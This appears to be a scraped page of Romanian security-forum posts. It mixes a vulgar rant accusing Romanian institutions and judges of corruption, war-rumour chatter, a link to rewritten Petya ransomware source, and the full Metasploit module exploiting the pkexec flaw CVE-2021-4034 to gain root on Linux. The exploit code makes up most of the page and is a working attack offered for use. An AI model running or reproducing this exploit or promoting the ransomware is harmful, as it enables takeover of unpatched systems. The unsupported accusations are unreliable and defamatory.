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@Dragos esti amuzant cu GDPR-ul. Nicio institutie din Romania nu respecta GDPR. Nici macar Autoritatea Națională de Supraveghere a Prelucrării Datelor cu Caracter Personal. Mai mult decat atat, au cumetrii si protejeaza tiganii care fac spam si au contracte cu institutiile statului roman ticalos si preacurvit. Tot ce se fura in mod scarbavnic in tara lui peste prajit in ulei de motor, se face cu sprijinul SRI. Aia asa, pe langa afacerile de pe aeroport si matraseniile cu bagarea pumnlului in gura diversilor operator economici pentru a facilita manarelile altora. Stiati ca intai se fac interceptari si apoi se obtin ordine judecatoresti? Dar ca intregul sistem de justitie e corupt precum curvele ce sug pula prin cabinele telefonice? Judecatorii au gramada de dosare penale facute si sunt amenintati ca intra pe rol daca nu dau verdictele dorite. 33 de ani de hotie si labageala. Bataie de joc pe banul public. Ca tot a venit vorba de comunicatii. Unde pula mea e site-ul MCSI.RO ? S-au dat 63.000 de euro unei firme cu activitatea inghetata sa puna online o pula cu urechi facuta in joomla. A stat online 4 luni, apoi au mai dat inca 30.000 de euro pentru refacerea lui. Au abandonat la scurt timp proiectul si au redirectat catre site-ul oficial din laba, comunicatii.gov.ro. Asta are certificatul SSL expirat din 21 mai 2021. Sat fara caini si curve proaste pe posturi bine platite. Aia e romania coaie. Treziti-va si plecati de acolo cat mai puteti inca. S-a intors Inchizitia5 points
Inca sunt socat cum de ataca cu tancul nea Costica cand exista atata tehnologie....3 points
Executabilul de la Petya Ransomware Rescris de la 0 in C (pentru scop educational). Totul este explicat concret si clar. SC: https://github.com/reservedcloud/Petya2 Codul sursa este licentiat cu GPL 3.0, deci orice schimbare sau publicare a sursei fara credite poate fi data jos printr-un DMCA.2 points
Fake (va spun din surse sigure... Unchi in cadrul Armatei Ro)2 points
Ataca nea Ivan cu tancul, dar ai vazut Ucraina cate asasinari a facut si cate bombardamente a evitat. Chiar crezi ca serviciile de informatii nu lucreaza cu tehnologia sa intercepteze miscarile tancurilor? Crezi ca Bayraktar, AWACS si MQ-9 stau si ruginesc pe aeroporturi? Apropo, chiar azi mi-a sarit traficul pe honeypotul pentru scam-emails, 4 noi campanii. Se misca ceva in online.1 point
This is a Metasploit module for the argument processing bug in the polkit pkexec binary. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent. Download: ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Local Privilege Escalation in polkits pkexec', 'Description' => %q{ A bug exists in the polkit pkexec binary in how it processes arguments. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent. }, 'License' => MSF_LICENSE, 'Author' => [ 'Qualys Security', # Original vulnerability discovery 'Andris Raugulis', # Exploit writeup and PoC 'Dhiraj Mishra', # Metasploit Module 'bwatters-r7' # Metasploit Module ], 'DisclosureDate' => '2022-01-25', 'Platform' => [ 'linux' ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [ [ 'x86_64', { 'Arch' => [ ARCH_X64 ] } ], [ 'x86', { 'Arch' => [ ARCH_X86 ] } ], [ 'aarch64', { 'Arch' => [ ARCH_AARCH64 ] } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true }, 'Privileged' => true, 'References' => [ [ 'CVE', '2021-4034' ], [ 'URL', 'https://www.whitesourcesoftware.com/resources/blog/polkit-pkexec-vulnerability-cve-2021-4034/' ], [ 'URL', 'https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt' ], [ 'URL', 'https://github.com/arthepsy/CVE-2021-4034' ], # PoC Reference [ 'URL', 'https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat-linux-systems-pwnkit/' ], # Vuln versions [ 'URL', 'https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py' ] # vuln versions ], 'Notes' => { 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK ] } ) ) register_options([ OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]), OptString.new('PKEXEC_PATH', [ false, 'The path to pkexec binary', '' ]) ]) register_advanced_options([ OptString.new('FinalDir', [ true, 'A directory to move to after the exploit completes', '/' ]), ]) end def on_new_session(new_session) # The directory the payload launches in gets deleted and breaks some commands # unless we change into a directory that exists super old_session = @session @session = new_session cd(datastore['FinalDir']) @session = old_session end def find_pkexec vprint_status('Locating pkexec...') if exists?(pkexec = cmd_exec('which pkexec')) vprint_status("Found pkexec here: #{pkexec}") return pkexec end return nil end def check # Is the arch supported? arch = kernel_hardware unless arch.include?('x86_64') || arch.include?('aarch64') || arch.include?('x86') return CheckCode::Safe("System architecture #{arch} is not supported") end # check the binary pkexec_path = datastore['PKEXEC_PATH'] pkexec_path = find_pkexec if pkexec_path.empty? return CheckCode::Safe('The pkexec binary was not found; try populating PkexecPath') if pkexec_path.nil? # we don't use the reported version, but it can help with troubleshooting version_output = cmd_exec("#{pkexec_path} --version") version_array = version_output.split(' ') if version_array.length > 2 pkexec_version = Rex::Version.new(version_array[2]) vprint_status("Found pkexec version #{pkexec_version}") end return CheckCode::Safe('The pkexec binary setuid is not set') unless setuid?(pkexec_path) # Grab the package version if we can to help troubleshoot sysinfo = get_sysinfo begin if sysinfo[:distro] =~ /[dD]ebian/ vprint_status('Determined host os is Debian') package_data = cmd_exec('dpkg -s policykit-1') pulled_version = package_data.scan(/Version:\s(.*)/)[0][0] vprint_status("Polkit package version = #{pulled_version}") end if sysinfo[:distro] =~ /[uU]buntu/ vprint_status('Determined host os is Ubuntu') package_data = cmd_exec('dpkg -s policykit-1') pulled_version = package_data.scan(/Version:\s(.*)/)[0][0] vprint_status("Polkit package version = #{pulled_version}") end if sysinfo[:distro] =~ /[cC]entos/ vprint_status('Determined host os is CentOS') package_data = cmd_exec('rpm -qa | grep polkit') vprint_status("Polkit package version = #{package_data}") end rescue StandardError => e vprint_status("Caught exception #{e} Attempting to retrieve polkit package value.") end if sysinfo[:distro] =~ /[fF]edora/ # Fedora should be supported, and it passes the check otherwise, but it just # does not seem to work. I am not sure why. I have tried with SeLinux disabled. return CheckCode::Safe('Fedora is not supported') end # run the exploit in check mode if everything looks right if run_exploit(true) return CheckCode::Vulnerable end return CheckCode::Safe('The target does not appear vulnerable') end def find_exec_program return 'python' if command_exists?('python') return 'python3' if command_exists?('python3') return nil end def run_exploit(check) if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end arch = kernel_hardware vprint_status("Detected architecture: #{arch}") if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch')) fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload') end pkexec_path = datastore['PKEXEC_PATH'] if pkexec_path.empty? pkexec_path = find_pkexec end python_binary = find_exec_program # Do we have the pkexec binary? if pkexec_path.nil? fail_with Failure::NotFound, 'The pkexec binary was not found; try populating PkexecPath' end # Do we have the python binary? if python_binary.nil? fail_with Failure::NotFound, 'The python binary was not found; try populating PythonPath' end unless writable? datastore['WRITABLE_DIR'] fail_with Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable" end local_dir = ".#{Rex::Text.rand_text_alpha_lower(6..12)}" working_dir = "#{datastore['WRITABLE_DIR']}/#{local_dir}" mkdir(working_dir) register_dir_for_cleanup(working_dir) random_string_1 = Rex::Text.rand_text_alpha_lower(6..12).to_s random_string_2 = Rex::Text.rand_text_alpha_lower(6..12).to_s @old_wd = pwd cd(working_dir) cmd_exec('mkdir -p GCONV_PATH=.') cmd_exec("touch GCONV_PATH=./#{random_string_1}") cmd_exec("chmod a+x GCONV_PATH=./#{random_string_1}") cmd_exec("mkdir -p #{random_string_1}") payload_file = "#{working_dir}/#{random_string_1}/#{random_string_1}.so" unless check upload_and_chmodx(payload_file.to_s, generate_payload_dll) register_file_for_cleanup(payload_file) end exploit_file = "#{working_dir}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" write_file(exploit_file, exploit_data('CVE-2021-4034', 'cve_2021_4034.py')) register_file_for_cleanup(exploit_file) cmd = "#{python_binary} #{exploit_file} #{pkexec_path} #{payload_file} #{random_string_1} #{random_string_2}" print_warning("Verify cleanup of #{working_dir}") vprint_status("Running #{cmd}") output = cmd_exec(cmd) # Return to the old working directory before we delete working_directory cd(@old_wd) cmd_exec("rm -rf #{working_dir}") vprint_status(output) unless output.empty? # Return proper value if we are using exploit-as-a-check if check return false if output.include?('pkexec --version') return true end end def exploit run_exploit(false) end end Source1 point
Ce sa face noi in armata? Nimic ca e fake si e debunked de 10 ori pe zi. Jalnica incercare de a crea panica in societate prin fake news. Se pare ca RST nu mai e asa relevant 🥲 nu s-au prea postat fake newsuri pe aici in ultima perioada.. trist0 points